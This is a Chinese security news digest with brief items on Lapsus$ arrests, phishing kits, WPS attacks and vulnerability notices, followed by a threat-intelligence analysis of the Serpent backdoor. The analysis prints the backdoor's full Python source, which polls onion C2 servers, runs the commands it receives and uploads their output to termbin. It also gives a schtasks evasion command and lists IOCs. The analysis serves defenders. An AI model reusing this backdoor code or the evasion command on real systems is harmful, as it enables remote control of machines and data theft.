1
PART
安全资讯
Lapsus$涉嫌微软、英伟达、Okta黑客攻击被捕
当Lapsus$data勒索团伙宣布其几名成员正在度假时,伦敦市警方表示,他们已经逮捕了七名与该团伙有关的个人。据信,英国牛津的一名未成年人是该组织的领导者之一,该组织泄露了英伟达、三星、微软和Okta等知名公司的封闭源代码和专有数据。Lapsus$还声称攻击游戏开发商育碧软件、电信公司沃达丰和电子商务巨头Mercado。
【来源】安全客
Morgan Stanley客户账户在社会工程攻击中被破解
网络钓鱼工具不断演变,以躲避安全软件
网络犯罪论坛上出售的现代网络钓鱼工具包作为现成的软件包,具有多个复杂的检测绕过和流量过滤系统,以确保互联网安全解决方案不会将其标记为威胁。互联网上有大量模仿知名品牌的虚假网站引诱受害者,窃取他们的支付细节或账户凭证。这些网站中的大多数都是使用网络钓鱼工具包构建的,这些工具包具有品牌标识、逼真的登录页面,如果是高级产品,则是由一组基本元素组合而成的动态网页。
由于其提供的自动化功能,威胁参与者广泛使用网络钓鱼工具,因为他们通常每天必须建立数百个假网站,以替换前一天检测到并阻止的网站。然而,这并不意味着这些工具包的作者不努力加入反检测系统,以帮助他们保持更长时间的运行。
卡巴斯基报告说,在2021,它发现了至少469个支持至少120万个钓鱼网站的钓鱼网络工具包。正如这家安全公司强调的那样,包括反机器人、反检测和地理拦截功能的复杂网络钓鱼工具的数量不断增加。这些网站的URL通过电子邮件、即时消息、论坛帖子,甚至YouTube视频传播,所以要小心。
【来源】安全客
黑客利用wps漏洞攻击博彩公司
安全公司 Avast 的研究人员发表报告《Operation Dragon Castling》,称攻击者利用金山办公软件 WPS Office 的漏洞,攻击东南亚尤其是台湾香港菲律宾的博彩公司。鉴于攻击者的娴熟技术和使用的先进工具,研究人员怀疑是某个 APT 组织在搜集情报或获取经济利益。攻击者使用的策略包括向目标公司的支持团队发送邮件,要求他们检查软件的 bug,邮件附带了一个感染了病毒的安装程序。攻击者使用的另一种方法是假的 WPS 更新程序 wpsupdate.exe,该更新程序从属于金山的域名 update.wps[.]cn 下载,但域名对应的 IP 地址 103.140.187.16 不属于金山公司所有。研究人员猜测是它是攻击者使用的假更新服务器。该更新程序会通过侧加载(sideloading)安装两个恶意程序建立后门控制被感染计算机。
【来源】Solidot
Google Android 权限提升漏洞
Google Android是美国谷歌(Google)公司的一套以Linux为基础的开源操作系统。Google Android 12之前版本存在权限提升漏洞。该漏洞源于不正确的程序对高级本地过程的调用。攻击者可利用此漏洞导致需要系统执行权限的本地权限升级。
【来源】CNVD
跨站请求伪造漏洞
达梦数据库管理系统存在XML实体注入漏洞。
达梦数据库管理系统是达梦公司推出的具有完全自主知识产权的数据库管理系统,简称DM。达梦数据库管理系统存在XML实体注入漏洞,攻击者可利用漏洞获取敏感信息。
【来源】CNVD
安全漏洞
盛威时代科技集团有限公司道路客运联网售票系统存在SQL注入漏洞。
盛威时代科技集团有限公司,目前已经成为中国最大的互联网+公众出行综合服务运营平台,为多个省市自治区建设运营了当地的省级道路客运联网售票系统。盛威时代科技集团有限公司道路客运联网售票系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。
【来源】CNVD
威胁情报
Serpent后门攻击瞄准法国建筑公司和政府部门
字符画
--1、详情
攻击者在攻击中使用法语,如下所示:From: "Jeanne"Subject "Candidature - Jeanne Vrakele"邮件包含一个带有宏代码的恶意 Word 文档,诱饵内容与欧盟通用数据保护条例(GDPR)有关。
诱饵文档
文档打开后通过 https://www.fhccu.com/images/ship3.jpg下载图片,图片使用了隐写术隐藏了一个 PowerShell 脚本。利用该 PowerShell 脚本下载、安装与更新 Chocolatey 安装程序与其他脚本,此前没有观察到攻击者使用 Chocolatey。
通过 Chocolatey 安装 Python 与各种依赖(如 PySocks 等),使失陷主机可以通过 SOCKS 与 HTTP 代理转发流量。
隐写图片
接着拉取的 https://www.fhccu.com/images/7.jpg中也使用隐写术隐藏了 base64 编码的 Python 脚本 MicrosoftSecurityUpdate.py,该脚本用于创建并执行 .bat 文件与 Python 脚本。
Python 脚本如下所示:
#!/usr/bin/python3
from subprocess import Popen, PIPE, STDOUT
import requests
import re
import socket
import time
cmd_url_order = 'http://mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd.onion.pet/index.html'
cmd_url_answer = 'http://gg-fwk7yj5hus3ujdls5bjza4apkpfw5bjqbq4j6rixlogylr5x67dmid.onion.pet/index.html'
hostname = socket.gethostname()
hostname_pattern = 'host:%s-00' % hostname
headers = {}
referer = {'Referer': hostname_pattern}
cache_control = {'Cache-Control': 'no-cache'}
headers.update(referer)
headers.update(cache_control)
check_cmd_1 = ''
def recvall(sock, n):
data = b''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return data
def get_cmd():
req = requests.get(cmd_url_order, headers=headers).content.decode().strip()
if req == '':
pass
else:
return req
def run_cmd(cmd):
cmd_split = cmd.split('--')
if cmd_split[1] == hostname:
cmd = cmd_split[2]
print(cmd)
run = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT)#.decode()
out = run.stdout.read()
if not out:
out = b'ok'
termbin_cnx = socks.socksocket()
termbin_cnx = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, '172.17.0.1', '9050', True)
termbin_cnx.connect(('termbin.com', 9999))
termbin_cnx.send(out)
recv = termbin_cnx.recv(100000)
termbin_url_created = recv.decode().rstrip('x00').strip()
print(termbin_url_created)
termbin_header = {'Referer': hostname_pattern+" -- "+termbin_url_created}
headers.update(termbin_header)
try:
push = requests.get(cmd_url_answer, headers=headers)
print('executed')
headers.update(referer)
except Exception as e:
print(e)
pass
else:
print('not for me')
while True:
time.sleep(10)
try:
check_cmd = get_cmd()
if check_cmd != check_cmd_1:
time.sleep(20)
print(check_cmd)
run_cmd(check_cmd)
check_cmd_1 = check_cmd
pass
except Exception as e:
print(e)
Pass
Serpent 后门会定时轮询 ping 攻击者的服务器,等待 <random integer>--<hostname>--<command>形式的响应。如果 <hostname>与失陷主机的主机名相同,则运行 <command>。攻击者使用 PySocks 连接到 Termbin,将命令执行的输出上传。最后,将存储数据的 URL 回传给攻击者,让攻击者查看执行结果。
执行链
两个使用隐写的图片都部署在牙买加信用合作社的网站上:
隐写图片
攻击者使用 Tor 作为 C&C 的基础设施:
http://mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd.onion.pet/index.html
--2、其他工具
除了以上恶意软件,还发现了其他恶意软件。例如使用 schtasks.exe 签名二进制代理执行的新恶意软件,这是一种绕过安全防护措施的手段。
命令如下所示:
schtasks.exe /CREATE /SC ONEVENT /EC application /mo *[System/EventID=777] /f /TN run /TR "calc.exe" & EVENTCREATE /ID 777 /L APPLICATION /T INFORMATION /SO DummyEvent /D "Initiatescheduled task." & schtasks.exe /DELETE /TN run /f
命令利用 schtasks.exe 创建一次性任务来调用可执行文件,该命令随后会创建一个虚拟事件来触发任务并从任务调度程序中删除该任务。这样,会作为 taskhostsw.exe 的子进程执行,而 taskhostsw.exe 是签名的 Windows 二进制文件。
--3、威胁
攻击者的独特行为表明这可能是一个高级的、定向的攻击,这种绕过安全防护措施的方法是独一无二的。研究人员此前很少在攻击中应用隐写术,使用 schtasks.exe 执行程序的方式也是天下独一份的。
但 Proofpoint 的研究人员并未将其与已知攻击者关联起来,尽管攻击者的目的尚不明确,但攻击者通过后门可以执行很多恶意行动。
--4、IOC
lhttps://www.fhccu.com/images/ship3.jpg
lhttps://www.fhccu.com/images/7.jpg
lhttp://gg/fwk7yj5hus3ujdls5bjza4apkpfw5bjqbq4j6rixlogylr5x67dmid.onion.pet/index.html
lhttp://mhocujuh3h6fek7k4efpxo5teyigezqkpixkbvc2mzaaprmusze6icqd.onion.pet/index.html
lhttp://shorturl.at/qzES8
lf988e252551fe83b5fc3749e1d844c31fad60be0c25e546c80dbb9923e03eaf2
lec8c8c44eae3360be03e88a4bc7bb03f3de8d0a298bff7250941776fcea9faab
l8912f7255b8f091e90083e584709cf0c69a9b55e09587f5927c9ac39447d6a19
来源:FreeBuf
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...